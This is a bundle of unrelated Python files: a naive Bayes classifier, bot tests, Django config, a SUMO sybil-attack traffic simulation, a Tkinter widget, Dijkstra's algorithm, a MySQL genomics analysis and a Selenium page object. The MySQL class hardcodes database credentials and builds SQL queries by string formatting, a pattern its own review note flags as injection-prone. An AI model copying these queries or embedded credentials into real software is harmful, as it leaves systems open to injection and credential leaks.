        self.dvs = {}          # distinct labels; becomes a list in train_with_data

    def store_actual_labels(self, data):
        # Preserve the original label under 'actual_label' (idempotent),
        # because 'label' is overwritten with 0/1 during pairwise training.
        for datum in data:
            if 'actual_label' not in list(datum.keys()):
                datum['actual_label'] = datum['label']

    def train_with_data(self, data):
        """Train one binary classifier per unordered pair of labels in *data*."""
        self.accuracies = {}
        self.classifiers = {}
        self.store_actual_labels(data)
        # Enumerate labels, split data by labels
        dv_split_data = {}
        for datum in data:
            dv = datum['actual_label']
            try:
                dv_split_data[dv].append(datum)
            except KeyError:
                dv_split_data[dv] = []
                dv_split_data[dv].append(datum)
        # Record the set of distinct labels seen in the training data
        self.dvs = list(dv_split_data.keys())
        # Generate splitter list and classifiers (one per unordered label pair)
        for dv_1 in self.dvs:
            for dv_2 in self.dvs:
                if dv_1 < dv_2:
                    # Make a subset of data containing only these two labels
                    working_data = []
                    working_data.extend(dv_split_data[dv_1])
                    working_data.extend(dv_split_data[dv_2])
                    # Get accuracies of each splitter; labels become
                    # 1 for dv_1 and 0 for dv_2
                    classifier = NaiveBayesClassifier()
                    self.make_data_true_on_sole_dv(working_data, dv_1)
                    # NOTE(review): the 0 here is the fold-count argument;
                    # its meaning depends on NaiveBayesClassifier -- confirm.
                    accuracy = classifier.n_fold_validate(working_data, 0)
                    try:
                        self.accuracies[dv_1][dv_2] = round(accuracy, 4)
                    except KeyError:
                        self.accuracies[dv_1] = {}
                        self.accuracies[dv_1][dv_2] = round(accuracy, 4)
                    # Retrain with all data
                    classifier.train_with_data(working_data)
                    try:
                        self.classifiers[dv_1][dv_2] = classifier
                    except KeyError:
                        self.classifiers[dv_1] = {}
                        self.classifiers[dv_1][dv_2] = classifier

    def test_with_data(self, data):
        """Return the fraction of *data* whose prediction matches 'actual_label'."""
        correct_count = 0
        for datum in data:
            if datum["actual_label"] == self.predict(datum["features"]):
                correct_count += 1
        return correct_count / len(data)

    def predict(self, features):
        """Predict a label by accuracy-weighted voting over pairwise classifiers."""
        confidences = {}
        for dv in self.dvs:
            confidences[dv] = 0.0
        for dv_1 in self.dvs:
            for dv_2 in self.dvs:
                if dv_1 < dv_2:
                    prediction = self.classifiers[dv_1][dv_2].predict(features)
                    reliability = self.accuracies[dv_1][dv_2]
                    # prediction == 1 means "looks like dv_1"
                    # (see make_data_true_on_sole_dv)
                    if prediction == 1:
                        winner = dv_1
                    else:
                        winner = dv_2
                    confidences[winner] += reliability
    # Find best confidence
        best = self.dvs[0]
        for dv in self.dvs:
            if confidences[dv] > confidences[best]:
                best = dv
        return best

    def make_data_true_on_sole_dv(self, data, target_dv):
        # Binarise labels in place: 1 where the original label equals
        # target_dv, else 0.
        for datum in data:
            datum['label'] = int(datum['actual_label'] == target_dv)

    def n_fold_validate(self, data, sample_count):
        """Cross-validate on *data* in *sample_count* folds; return mean accuracy.

        NOTE(review): sample_count == 0 divides by zero at the end.
        """
        self.store_actual_labels(data)
        subset_list = []
        list_size = len(data)
        for i in range(sample_count):
            subset_list.append(data[int(i * list_size / sample_count):int((i + 1) * list_size / sample_count)])
        total_accuracy = 0.0
        for i in range(sample_count):
            # Train on all folds except fold i, then test on fold i
            data_set_without_chosen_sample = []
            for j in range(sample_count):
                if i != j:
                    data_set_without_chosen_sample += subset_list[j]
            chosen_sample = subset_list[i]
            self.train_with_data(data_set_without_chosen_sample)
            accuracy = self.test_with_data(chosen_sample)
            print("Accuracy for round " + str(i) + " is " + str(round(accuracy, 3)))
            total_accuracy += accuracy
        total_accuracy /= sample_count
        return total_accuracy
# Run the code: hand the classifier and file locations to the shared driver,
# which trains, validates, and writes the results CSV.
shared_library.main(
    Model=MultiClassNaiveBayesClassifier,
    training_set_loc=training_set_loc,
    testing_set_loc=testing_set_loc,
    results_loc=results_loc,
    iv_count=iv_count,
    validation_count=validation_count
)
|
# pylint: disable=duplicate-code, too-many-statements
''' Unit test for basic commands '''
import unittest
import logging
from test.common import async_test, BaseTestCase
# Initialize loggers: silence everything below WARNING during test runs
logging.basicConfig(level=logging.WARNING)
class TestCommand(BaseTestCase):
    ''' Test basic commands.

    Uses assertIsNotNone/assertIn instead of assertTrue on compound
    expressions so failures report the offending value.
    '''

    @async_test
    async def test_start(self):
        ''' Test start command '''
        user = self.user
        await user.send_message('/start')
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertIn('To predict', message.text)

    @async_test
    async def test_help(self):
        ''' Test help command '''
        user = self.user
        await user.send_message('/help')
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertIn('To predict', message.text)

    @async_test
    async def test_train_empty(self):
        ''' Test train command with empty argument '''
        user = self.user
        await user.send_message('/train')
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertIn('/train', message.text)
        self.assertIn('Example', message.text)

    @async_test
    async def test_train_tag(self):
        ''' Test train command with tag '''
        user = self.user
        tag = 'test123'
        # Test /train <tag>
        await user.send_message('/train {}'.format(tag))
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertIn(tag, message.text)
        # Test /done: the reply should still mention the trained tag
        await user.send_message('/done')
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertIn(tag, message.text)
        # Test /done again: no active session, so the tag must be absent
        await user.send_message('/done')
        message = await user.get_message()
        self.assertIsNotNone(message)
        self.assertNotIn(tag, message.text)
# Allow running this test module directly.
if __name__ == '__main__':  # pragma: no cover
    unittest.main()
|
# NOTE(review): django.conf.urls.patterns and string view references were
# deprecated in Django 1.8 and removed in 1.10; this module only runs on
# older Django versions.
from django.conf.urls import patterns, url
from apps.inicio.views import index2

urlpatterns = patterns('apps.inicio.views',
    # string view: resolved as apps.inicio.views.index_view via the prefix
    url(r'^$','index_view', name="index"),
    url(r'^index/', index2.as_view()),
)
|
# Generated by Django 2.0.4 on 2018-04-28 06:57
from django.db import migrations, models


class Migration(migrations.Migration):
    """Add the optional banner_image upload field to BlogPage."""

    dependencies = [
        ('blog', '0005_remove_blogpage_post_title'),
    ]

    operations = [
        migrations.AddField(
            model_name='blogpage',
            name='banner_image',
            field=models.ImageField(blank=True, upload_to='blogbanners'),
        ),
    ]
|
import os
import sys
import socket
import optparse
import subprocess
import random
import select
import struct
import binascii
import time
import threading
from traci import trafficlights, simulation, edge, junction
import traci.constants as tc
from datetime import datetime
from optparse import OptionParser
''' This script runs the simulation in a sybil attack on one junction only TLS is actuated with time gap '''
# to import python modules from the $SUMO_HOME/tools directory
try:
    # Try both the in-tree tests layout and the $SUMO_HOME docs layout.
    sys.path.append(os.path.join(os.path.dirname(
        __file__), '..', '..', '..', '..', "tools")) # tutorial in tests
    sys.path.append(os.path.join(os.environ.get("SUMO_HOME", os.path.join(
        os.path.dirname(__file__), "..", "..", "..")), "tools")) # tutorial in docs
    from sumolib import checkBinary
except ImportError:
    sys.exit("please declare environment variable 'SUMO_HOME' as the root directory of your sumo installation (it should contain folders 'bin', 'tools' and 'docs')")
import traci
def run():
    """Main simulation loop (Python 2): inject sybil vehicles on a fixed
    route and record the real vehicles seen around junction '386'."""
    global ct
    ct = 0
    edgesList = []     # NOTE(review): never used
    vehicle_list = []  # ids of real (non-sybil) vehicles seen near the junction
    # junction '386' is of interest to our adaptive traffic control; subscribe
    # to all vehicles within a 42 m context range around it
    junction_ID = '386'
    traci.junction.subscribeContext(junction_ID, tc.CMD_GET_VEHICLE_VARIABLE, 42)
    # route created for the sybil vehicles
    traci.route.add(routeID="r1",edges=["-479572754#1","-479572754#0", "-456316923"])
    print 'CA CEST LE PROGRAM'
    #print traci.trafficlights.getProgram('386')
    # Every 100 s, starting at t=28000 s, inject 6 sybil vehicles whose ids
    # all start with 10000000
    d=28000
    z=0
    for i in range(40):
        v1="10000000" + str(z)
        v2="10000000" + str(z+1)
        v3="10000000" + str(z+2)
        v4="10000000" + str(z+3)
        v5="10000000" + str(z+4)
        v6="10000000" + str(z+5)
        traci.vehicle.add(str(v1),"r1",depart=d, pos=0)
        traci.vehicle.add(str(v2),"r1",depart=d, pos=0)
        traci.vehicle.add(str(v3),"r1",depart=d, pos=0)
        traci.vehicle.add(str(v4),"r1",depart=d, pos=0)
        traci.vehicle.add(str(v5),"r1",depart=d, pos=0)
        traci.vehicle.add(str(v6),"r1",depart=d, pos=0)
        # color the sybil vehicles red for the GUI
        traci.vehicle.setColor(str(v1),(250,0,0,0))
        traci.vehicle.setColor(str(v2),(250,0,0,0))
        traci.vehicle.setColor(str(v3),(250,0,0,0))
        traci.vehicle.setColor(str(v4),(250,0,0,0))
        traci.vehicle.setColor(str(v5),(250,0,0,0))
        traci.vehicle.setColor(str(v6),(250,0,0,0))
        d=d+100
        z=z+6
    while ct < 32400000:
        traci.simulationStep()
        ct = simulation.getCurrentTime()
        # Collect the vehicles currently within range of the junction
        p=traci.junction.getContextSubscriptionResults(junction_ID)
        if p is not None:
            temp=list(p)
            for x in temp:
                # skip sybil vehicles (ids >= 10000000); record each real id once
                if ((vehicle_list.count(x)==0) & (int(x)<10000000)):
                    vehicle_list.append(x)
        # NOTE(review): this rewrites the whole output file on every step;
        # writing once after the loop would be much cheaper.
        outputVehicle = "Sybil_1_A_1/vehicles_around_junction" + junction_ID + str(opt.run) +".txt"
        with open(outputVehicle,'w') as out:
            for y in vehicle_list:
                out.write(y + '\n')
            out.close()  # NOTE(review): redundant -- "with" already closes it
    traci.close()
    sys.stdout.flush()
def send_time(ct):
    """Send the current simulation time *ct* to the companion server and
    check its confirmation.  (Python 2.)"""
    # NOTE(review): "print sys.stderr, ..." prints the file object followed
    # by the text to stdout; "print >> sys.stderr, ..." was probably
    # intended here and below.
    print sys.stderr, 'Sending time to server'
    date = datetime.now()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = ('127.0.0.1', 8000)
    sock.connect(server_address)
    print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
    # message layout: 1 byte client id (0 = SUMO) + 4-byte big-endian time
    t = struct.pack('>B I', 0, ct)
    sock.sendall(t)
    r = sock.recv(24)
    if r:
        if r == 'Time received':
            print 'Valid time reception confirmation received'
        else:
            print 'Invalid time reception confirmation received'
    else:
        print 'No time reception confirmation received'
    print 'Closing connection with server at %s' % date
    sock.close()
def send(tlsID, tlsState):
    """Send a traffic-light state to the companion server and verify the echo.

    (Python 2.)  Protocol: request = (client id 0, mode 1 = write, tlsID),
    then the raw tlsState string; the server echoes (0, tlsID, tlsState).
    """
    # NOTE(review): "print sys.stderr, ..." prints the file object to stdout;
    # "print >> sys.stderr, ..." was probably intended (same below).
    print sys.stderr, 'Sending tlsState to server'
    date = datetime.now()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = ('127.0.0.1', 8000)
    sock.connect(server_address)
    print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
    request = struct.pack('>2B H', 0, 1, tlsID) # 0 = client = SUMO / 1 = mode = write
    sock.sendall(request)
    r = sock.recv(24)
    if r:
        if r == 'Waiting for data':
            print 'Request for tlsState received'
            sock.sendall(tlsState)
            print 'tlsState sent from SUMO for %s : %s' % (tlsID, tlsState)
            r = sock.recv(24)
            format = '>B H %is' % len(tlsState)  # NOTE: shadows the builtin "format"
            data = struct.unpack(format, r) # data = (0, tlsID, tlsState)
            if data[0] == 0 and data[1] == tlsID and data[2] == tlsState:
                print 'Valid tlsState confirmation received'
            else:
                print 'Invalid tlsState confirmation received'
        else:
            print 'Invalid request confirmation received'
    else:
        print 'Not response from server'
    print 'Closing connection with server at %s' % date
    sock.close()
def get_tlsState(tlsID, tlsState):
    """Ask the server for the state of traffic light *tlsID*.

    (Python 2.)  *tlsState* is used as a length template when unpacking the
    reply; returns the received state, or None when the server answered '0'.
    """
    print 'Getting tlsState'
    date = datetime.now()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server_address = ('127.0.0.1', 8000)
    sock.connect(server_address)
    # NOTE(review): "print sys.stderr, ..." prints the file object to stdout;
    # "print >> sys.stderr, ..." was probably intended.
    print sys.stderr, 'Starting communication with server', server_address, 'at %s' % date
    request = struct.pack('>2B H', 0, 0, tlsID) # 0 = client = SUMO / 0 = mode = read
    sock.sendall(request)
    r = sock.recv(24)
    if r:
        if r == '0':
            print 'No tlsState for %s received' % tlsID
            tlsState = None
        else:
            print 'tlsState for %s received' % tlsID
            format = '>B H %is' % len(tlsState)  # NOTE: shadows the builtin "format"
            data = struct.unpack(format, r) # data = (0, tlsID, tlsState)
            print 'Data received = ', data
            if data[0] == 0 and data[1] == tlsID and len(data[2]) == len(tlsState):
                print 'Valid tlsState value received'
                tlsID = data[1]
                tlsState = data[2]
            else:
                print 'Invalid tlsState value received'
    else:
        print 'Not response from server'
    print 'Closing connection with server at %s' % date
    sock.close()
    return tlsState
if __name__ == "__main__":
    # -r/--run: run id used to name all of the output files
    options = OptionParser()
    options.add_option("-r", "--run", help = "run id", dest="run", default = 1)
    (opt,arg) = options.parse_args()
    outputFile = "Sybil_1_A_1/tripInfo" + str(opt.run) + ".xml"
    logFile = "Sybil_1_A_1/log" + str(opt.run) + ".xml"
    print 'Sybil IS IN THE HOUSE'
    # random seed for SUMO so each run differs
    seed = random.randint(1000, 10000)
    # Starting Traci
    #traci.start(['sumo-gui', "-c", "montreal_A_1.sumo.cfg", "-a", "montreal.additional.xml", "--step-length", "0.1"])
    # to generate the tripInfo files in Sybil scenario for run number in the option
    traci.start(['sumo', "-c", "montreal_A_1.sumo.cfg", "--step-length", "0.1", "--seed", str(seed), "--tripinfo-output", outputFile, '--duration-log.statistics', 'True', '--collision.action', 'warn', '--log', logFile])
    run()
|
import Tkinter

# Names of all geometry-manager methods (place/pack/grid), used to decide
# whether an attribute lookup on ScrolledFrame should be proxied to the
# canvas or to the inner frame.  Python 2: dict.keys() returns lists,
# hence the "+" concatenation.
GM_KEYS = set(
    vars(Tkinter.Place).keys() +
    vars(Tkinter.Pack).keys() +
    vars(Tkinter.Grid).keys()
)
class ScrolledFrame(object):
    """A scrollable frame built from a Canvas plus two Scrollbars.

    Child widgets use this object as their master and are packed into an
    inner frame; geometry-manager calls on this object are forwarded to the
    canvas, everything else to the inner frame.  (Python 2 / Tkinter.)
    """
    _managed = False  # True once pack/grid was called (scrollbars placed)
    # XXX These could be options
    x_incr = 5  # horizontal scroll step, in pixels
    y_incr = 5  # vertical scroll step, in pixels

    def __init__(self, master=None, **kw):
        # width/height describe the visible canvas viewport
        self.width = kw.pop('width', 200)
        self.height = kw.pop('height', 200)
        self._canvas = Tkinter.Canvas(master, **kw)
        self.master = self._canvas.master
        self._hsb = Tkinter.Scrollbar(orient='horizontal',
                                      command=self._canvas.xview)
        self._vsb = Tkinter.Scrollbar(orient='vertical',
                                      command=self._canvas.yview)
        self._canvas.configure(
            xscrollcommand=self._hsb.set,
            yscrollcommand=self._vsb.set)
        # Inner frame that actually holds the child widgets
        self._placeholder = Tkinter.Frame(self._canvas)
        self._canvas.create_window(0, 0, anchor='nw', window=self._placeholder)
        # Defer scrollregion setup until the frame is mapped (children exist)
        self._placeholder.bind('<Map>', self._prepare_scroll)
        # Mouse-wheel scrolling (X11 Button-4/5 events)
        for widget in (self._placeholder, self._canvas):
            widget.bind('<Button-4>', self.scroll_up)
            widget.bind('<Button-5>', self.scroll_down)

    def __getattr__(self, attr):
        # Geometry-manager methods act on the canvas; place the scrollbars
        # the first time one is used.  All other attributes are delegated to
        # the inner frame so children can treat this object as their master.
        if attr in GM_KEYS:
            if not self._managed:
                # Position the scrollbars now.
                self._managed = True
                if attr == 'pack':
                    self._hsb.pack(side='bottom', fill='x')
                    self._vsb.pack(side='right', fill='y')
                elif attr == 'grid':
                    self._hsb.grid(row=1, column=0, sticky='ew')
                    self._vsb.grid(row=0, column=1, sticky='ns')
            return getattr(self._canvas, attr)
        else:
            return getattr(self._placeholder, attr)

    def yscroll(self, *args):
        self._canvas.yview_scroll(*args)

    def scroll_up(self, event=None):
        self.yscroll(-self.y_incr, 'units')

    def scroll_down(self, event=None):
        self.yscroll(self.y_incr, 'units')

    def see(self, event):
        """Scroll until the widget that just received focus is visible."""
        widget = event.widget
        w_height = widget.winfo_reqheight()
        c_height = self._canvas.winfo_height()
        y_pos = widget.winfo_rooty()
        if (y_pos - w_height) < 0:
            # Widget focused is above the current view
            while (y_pos - w_height) < self.y_incr:
                self.scroll_up()
                self._canvas.update_idletasks()
                y_pos = widget.winfo_rooty()
        elif (y_pos - w_height) > c_height:
            # Widget focused is below the current view
            while (y_pos - w_height - self.y_incr) > c_height:
                self.scroll_down()
                self._canvas.update_idletasks()
                y_pos = widget.winfo_rooty()

    def _prepare_scroll(self, event):
        """One-shot <Map> handler: size the scrollregion to fit the children."""
        frame = self._placeholder
        frame.unbind('<Map>')
        if not frame.children:
            # Nothing to scroll.
            return
        for child in frame.children.itervalues():
            child.bind('<FocusIn>', self.see)
        width, height = frame.winfo_reqwidth(), frame.winfo_reqheight()
        self._canvas.configure(scrollregion=(0, 0, width, height),
                               yscrollincrement=self.y_incr, xscrollincrement=self.x_incr)
        self._canvas.configure(width=self.width, height=self.height)
# Demo: a ScrolledFrame filled with a few widgets.
root = Tkinter.Tk()
sf = ScrolledFrame()
sf.grid(row=0, column=0, sticky='nsew')
sf.master.grid_columnconfigure(0, weight=1)
sf.master.grid_rowconfigure(0, weight=1)
for _ in range(10):
    lbl = Tkinter.Label(sf, text="Hi")
    lbl.pack()
    btn = Tkinter.Button(sf, text="Buh")
    btn.pack()
    entry = Tkinter.Entry(sf)
    entry.pack()
root.mainloop()
'''
from Xlib.display import Display
from Xlib.Xatom import STRING
display = Display()
root = display.screen().root
#view the current WM_NAME
print root.get_full_property(display.intern_atom('_NET_WM_NAME'), STRING)
import wnck
import subprocess
stacking_window_ids = subprocess.check_output("xprop -root _NET_CLIENT_LIST_STACKING", shell = True)[:-1] # exclude \n
lable, window_ids = stacking_window_ids.split("# ")
window_ids = window_ids.split(", ")
window_stack = []
for window_id in window_ids:
print window_id #, wnck.wnck_window_get_name(wnck.wnck_window_get(window_id))
import window_name_stack
import sys
window_title = window_stack.get()
print window_title
while 1:
new_window_title = window_stack.get()
if new_window_title != window_title :
window_title = new_window_title
print window_title
'''
|
import sys
import math
import pprint
def next_int(iter_lines):
    """Consume one line from *iter_lines* and return it parsed as an int."""
    line = next(iter_lines)
    return int(line)
def solve_testcases(solve_testcase):
    """Read all of stdin, then run *solve_testcase* once per test case.

    The first input line holds the number of test cases; each result is
    printed on its own line.
    """
    iter_lines = iter(sys.stdin.readlines())
    case_count = next_int(iter_lines)
    for _ in range(case_count):
        print(solve_testcase(iter_lines))
# Dijskra's shortest path algorithm
# https://practice.geeksforgeeks.org/problems/shortest-path-from-1-to-n/0
from collections import defaultdict
import heapq
class Graph:
    """Directed graph with per-edge distances keyed by unordered node pair."""

    def __init__(self):
        # adjacency: node -> list of successor nodes
        self._edges = defaultdict(list)
        # distances keyed by the normalised pair (min(a, b), max(a, b))
        self._distances = {}

    @classmethod
    def from_num_nodes(cls, num_nodes):
        """Build the puzzle graph: node i connects to i+1 and to 3*i."""
        graph = cls()
        for node in range(1, num_nodes + 1):
            for successor in (node + 1, node * 3):
                if successor <= num_nodes:
                    graph.add_edge(node, successor)
        return graph

    def nodes(self):
        return self._edges.values()

    def distance(self, a, b):
        return self._distances[self._convert_distance(a, b)]

    def edges(self, a):
        return self._edges[a]

    def add_edge(self, a, b, distance=1):
        """Set edge from a -> b with a distance."""
        self._edges[a].append(b)
        self._distances[self._convert_distance(a, b)] = distance

    @staticmethod
    def _convert_distance(a, b):
        # Normalise the pair so (a, b) and (b, a) share one distance entry.
        return (a, b) if a <= b else (b, a)
def dijskras_shortest_path(graph, start, dest):
    """Return the length of the shortest path from *start* to *dest*.

    *graph* must provide ``edges(node)`` (successor list) and
    ``distance(a, b)`` (edge weight).  Returns ``math.inf`` when *dest*
    is unreachable.
    """
    # best known distance per node; unseen nodes default to infinity
    visited = defaultdict(lambda: math.inf)
    unvisited = [(0, start)]  # min-heap of (distance, node)
    while unvisited:
        # while there are unvisited nodes pick up each node and calculate
        # the distance to all its children
        distance, node = heapq.heappop(unvisited)
        if distance > visited[node]:
            # stale heap entry: a shorter path to this node was already settled
            continue
        # value comparison -- the original used "is not math.inf", an
        # identity check on a float, which is fragile
        assert distance != math.inf
        visited[node] = distance
        for child in graph.edges(node):
            child_distance = distance + graph.distance(node, child)
            if child_distance < visited[child]:
                visited[child] = child_distance
                heapq.heappush(unvisited, (child_distance, child))
    return visited[dest]
def solve_shortest_path():
    """Driver for the shortest-path problem: one node count per test case."""
    def solve_testcase(iter_lines):
        node_count = next_int(iter_lines)
        puzzle_graph = Graph.from_num_nodes(node_count)
        return dijskras_shortest_path(puzzle_graph, 1, node_count)
    solve_testcases(solve_testcase)
# solve_shortest_path()
# N = 887
# graph = Graph.from_num_nodes(N)
# print("Edges:")
# pprint.pprint(graph._edges)
# print("Distances:")
# pprint.pprint(graph._distances)
#
# print("Result:")
# print(dijskras_shortest_path(graph, 1, N))
|
import MySQLdb
import csv
class SGAEventsInfo:
    """Summarise SGA/SM/SCNA event and driver-call statistics per gene from
    the TDI MySQL database into a CSV file.  (Python 2 / MySQLdb.)

    SECURITY NOTE(review): every query below is built with "%s" string
    formatting.  The ids interpolated here come from the database itself,
    but these should still be parameterised
    (cursor.execute(query, params)) to rule out SQL injection.
    """

    def __init__(self):
        self.db = MySQLdb.connect("localhost", "fanyu", "hellowork", "TDI")
        self.cursor = self.db.cursor()

    def findGeneName(self, geneID):
        """Return the gene name for *geneID*."""
        query = "SELECT gene_name FROM Genes WHERE gene_id= '%s'" %(geneID)
        self.cursor.execute(query)
        results = self.cursor.fetchall()
        return results[0][0]

    def findGeneId(self, geneName):
        """Return the gene id for *geneName*."""
        query = "SELECT gene_id FROM Genes WHERE gene_name= '%s'" %(geneName)
        self.cursor.execute(query)
        results = self.cursor.fetchall()
        return results[0][0]

    def findPatient(self, patient_id):
        """Return the patient name for *patient_id*."""
        query = "SELECT name FROM Patients WHERE patient_id= '%s'" %(patient_id)
        self.cursor.execute(query)
        results = self.cursor.fetchall()
        return results[0][0]

    def findDriverTumor(self, geneId):
        """Return {patient_id: [DEG_id, ...]} for tumors where *geneId* is
        called a driver (posterior above threshold, >= 5 regulated DEGs)."""
        query = "SELECT T.patient_id, T.DEG_id FROM TDI_Results as T, SGAPPNoiseThreshold as S\
 WHERE T.exp_id = 1 AND T.posterior >= S.threshold AND T.SGA_id = '%s' AND T.SGA_id = S.gene_id" %(geneId)
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        #key : (tumorid)
        #value : DEG_id
        tumor_DEG = {}
        for row in query_results:
            if tumor_DEG.has_key(row[0]):
                tumor_DEG[row[0]].append(row[1])
            else :
                tumor_DEG[row[0]] = []
                tumor_DEG[row[0]].append(row[1])
        #filter out SGA which regulate less than 5 degs
        tumor_DEG = dict((k,v) for k, v in tumor_DEG.iteritems() if len(v) >= 5)
        return tumor_DEG

    def countSGAEvents(self, geneId):
        """Return the number of distinct patients with an SGA in *geneId*."""
        query = "SELECT COUNT(DISTINCT patient_id) FROM SGAs WHERE gene_id = '%s'" %(geneId)
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        return query_results[0][0]

    #filter out drivers that has been called driver less than a certain number of tumors
    def findSMEvents(self, geneId, tumor_DEG):
        """Return (somatic-mutation event count, driver-call count, call rate)
        for *geneId*; (0, 0, "NaN") when there are no events."""
        query = "SELECT DISTINCT patient_id FROM Somatic_Mutations WHERE gene_id = '%s' AND protein_func_impact = 1" %(geneId)
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        numberOfSMEvents = len(query_results)
        if (numberOfSMEvents != 0):
            numberOfSMDriverCall = 0
            for row in query_results:
                if tumor_DEG.has_key(row[0]):
                    numberOfSMDriverCall += 1
            return (numberOfSMEvents, numberOfSMDriverCall, float(numberOfSMDriverCall)/numberOfSMEvents)
        else:
            return (0, 0, "NaN")

    def findSCNAmpvents(self, geneId, tumor_DEG):
        """Same as findSMEvents but for copy-number amplifications
        (gistic_score = 2)."""
        query = "SELECT DISTINCT patient_id FROM SCNAs WHERE gene_id = '%s' AND gistic_score = 2" %(geneId)
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        numberOfSCNAmpEvents = len(query_results)
        if (numberOfSCNAmpEvents != 0):
            numberOfSCNAmpDriverCall = 0
            for row in query_results:
                if tumor_DEG.has_key(row[0]):
                    numberOfSCNAmpDriverCall += 1
            return (numberOfSCNAmpEvents, numberOfSCNAmpDriverCall, float(numberOfSCNAmpDriverCall)/numberOfSCNAmpEvents)
        else:
            return (0, 0, "NaN")

    def findSCNDelEvents(self, geneId, tumor_DEG):
        """Same as findSMEvents but for copy-number deletions
        (gistic_score = -2)."""
        query = "SELECT DISTINCT patient_id FROM SCNAs WHERE gene_id = '%s' AND gistic_score = -2" %(geneId)
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        numberOfSCNDelEvents = len(query_results)
        if (numberOfSCNDelEvents != 0):
            numberOfSCNDelDriverCall = 0
            for row in query_results:
                if tumor_DEG.has_key(row[0]):
                    numberOfSCNDelDriverCall += 1
            return (numberOfSCNDelEvents, numberOfSCNDelDriverCall, float(numberOfSCNDelDriverCall)/numberOfSCNDelEvents)
        else:
            return (0, 0, "NaN")

    def findSGAEventsInforForAllSGA(self):
        """Write per-driver event/call statistics to SGAEvents.csv for every
        driver called in at least 30 tumors."""
        # cursor = self.db.cursor()
        # query = "SELECT DISTINCT gene_id FROM SGAs WHERE gene_id IS NOT NULL"
        # cursor.execute(query)
        # query_results = cursor.fetchall()
        tableName = "SGAEvents"
        drivers = self.findDriver(30)
        print len(drivers)
        with open("%s.csv"%(tableName), 'wb') as csvfile:
            writer=csv.writer(csvfile, delimiter=',',)
            writer.writerow(["SGA", "#SGAEvents", "#SGA-FI Call", "CallRate", "#SMEvents", "#SM-FI Call", "SMCallRate", "#SCNAmpEvents", "#SCNAmp-FI call", "SCNAmp-FICallRate", "#SCNDelEvents", "#SCNDel-FI call", "SCNDel-FICallRate"])
            # for row in query_results:
            # driver = row[0]
            for driver in drivers:
                numberOfSGAEvents = self.countSGAEvents(driver)
                if (numberOfSGAEvents >= 30):
                    tumor_DEG = self.findDriverTumor(driver)
                    numberOfSGADriverCall = len(tumor_DEG.keys())
                    SGAEventsInfo = (numberOfSGAEvents, numberOfSGADriverCall, float(numberOfSGADriverCall)/numberOfSGAEvents)
                    SMEventsInfo = self.findSMEvents(driver, tumor_DEG)
                    SCNAmpEventsInfo = self.findSCNAmpvents(driver, tumor_DEG)
                    SCNDelEventsInfo = self.findSCNDelEvents(driver, tumor_DEG)
                    SGA = self.findGeneName(driver)
                    print SGA
                    # print SGAEventsInfo
                    # print SMEventsInfo
                    # print SCNAmpEventsInfo
                    # print SCNDelEventsInfo
                    writer.writerow([SGA, SGAEventsInfo[0], SGAEventsInfo[1], SGAEventsInfo[2], SMEventsInfo[0], SMEventsInfo[1], SMEventsInfo[2], SCNAmpEventsInfo[0], SCNAmpEventsInfo[1], SCNAmpEventsInfo[2], SCNDelEventsInfo[0], SCNDelEventsInfo[1], SCNDelEventsInfo[2]])
        print "done"

    def findDriver(self, threshold):
        """Return gene ids called driver (>= 5 regulated DEGs) in at least
        *threshold* tumors."""
        #find all TDI records that satisfy the posterior threshold
        query = "SELECT T.patient_id, T.SGA_id, T.DEG_id FROM TDI_Results as T, SGAPPNoiseThreshold as S\
 WHERE T.exp_id = 1 AND T.posterior >= S.threshold AND T.SGA_id = S.gene_id"
        self.cursor.execute(query)
        query_results = self.cursor.fetchall()
        #organize TDI records to a dictionary, key is (tumorid , SGA_id), value is DEG_id
        tumor_SGA = {}
        for row in query_results:
            temp_tuple = (row[0], row[1])
            if tumor_SGA.has_key(temp_tuple):
                tumor_SGA[temp_tuple].append(row[2])
            else :
                tumor_SGA[temp_tuple] = []
                tumor_SGA[temp_tuple].append(row[2])
        #filter out SGA which regulate less than 5 degs
        tumor_SGA = dict((k,v) for k, v in tumor_SGA.iteritems() if len(v) >= 5)
        #extract driver from dictionary tumor_SGA
        SGA_tumor = {}
        for key in tumor_SGA:
            if SGA_tumor.has_key(key[1]):
                SGA_tumor[key[1]].append(key[0])
            else:
                SGA_tumor[key[1]] = []
                SGA_tumor[key[1]].append(key[0])
        SGA_tumor_subset = dict((k,v) for k, v in SGA_tumor.iteritems() if len(v) >= threshold)
        return SGA_tumor_subset.keys()
def main():
    # Build the SGAEvents CSV for all drivers above the call-count threshold.
    tdi = SGAEventsInfo()
    tdi.findSGAEventsInforForAllSGA()


if __name__ == "__main__":
    main()
|
from selenium.webdriver.common.by import By
from .abstract import PageElement
from .abstract import PageObject
class SignUpPage(PageObject):
    """Page object for the sign-up form; all locators target #id_sign_up_form."""
    username = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_username")
    email = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_email")
    password = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_password1")
    password_confirmation = PageElement(
        By.CSS_SELECTOR, "#id_sign_up_form #id_password2"
    )
    sign_up = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_sign_up_submit")
    # "next" shadows the builtin, but as a class attribute that is harmless.
    next = PageElement(By.CSS_SELECTOR, "#id_sign_up_form #id_sign_up_next")
|
import matplotlib.pyplot as plt
import numpy as np

# Photoelectric-effect analysis: linear fit of stopping potential vs. light
# frequency, compared against the V = (h/e)*f - W/e model.
JOULE_TO_EV = 6.24E18 # [eV/J]
EV_TO_JOULES = 1.6022E-19 # [J/eV]
PLANCK_CONST = 6.63E-34 # [J*s]
SPEED_OF_LIGHT = 3.0E8 # [m*s^-1]
CHARGE_E = 1.602E-19 # [C]
